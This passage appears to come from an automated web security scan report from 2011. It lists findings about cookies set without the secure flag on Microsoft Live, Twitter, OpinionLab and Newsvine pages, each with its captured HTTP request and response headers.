10.3. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Content-Length: 13160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...

10.4. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card.asp?time1= HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/
Date: Sun, 30 Jan 2011 01:37:11 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

10.5. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/
Date: Sat, 29 Jan 2011 23:50:47 GMT
Connection: close


10.6. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/
Date: Sun, 30 Jan 2011 16:57:26 GMT
Connection: close


10.7. https://security.live.com/LoginStage.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:56 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/
Set-Cookie: ASP.NET_SessionId=h2apx4z4mmbean55o3laku45; path=/; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title></h
...[SNIP]...

10.8. https://security.live.com/LoginStage.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
Set-Cookie: xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:42 GMT; path=/
Set-Cookie: wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

10.9. https://twitter.com/ToddKenreck

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:03:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356581-64489-22662
ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb"
Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

10.10. https://www.msnfeedback.com/perseus/se.ashx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.msnfeedback.com
Path:   /perseus/se.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /perseus/se.ashx HTTP/1.1
Host: www.msnfeedback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 01:58:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /perseus/se.htm
Set-Cookie: ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/perseus/se.htm'>here</a>.</h2>
</body></html>

10.11. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1
Host: login.live.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981

<!-- ServerInfo: BAYIDSLGN1H55 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

10.12. https://login.live.com/pp900/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp900/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp900/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1
X-Frame-Options: deny
Content-Length: 11416

<!-- ServerInfo: BAYIDSLGN1H36 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

10.13. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1
X-Frame-Options: deny
Content-Length: 11450

<!-- ServerInfo: BAYIDSLGN1H52 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

10.14. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11444

<!-- ServerInfo: BAYIDSLGN1H45 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...

10.15. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:17 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
Content-Length: 1188

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

10.16. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:14:43 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:13:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Content-Length: 11551

<!-- ServerInfo: TK2IDSMLGN1C04 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

10.17. https://sb.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sb.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://sb.voicefive.com/b2?
Date: Sun, 30 Jan 2011 01:37:06 GMT
Connection: close
Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.18. https://www.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

10.19. https://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:20:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


10.20. https://www.newsvine.com/_nv/accounts/global/information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


10.21. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

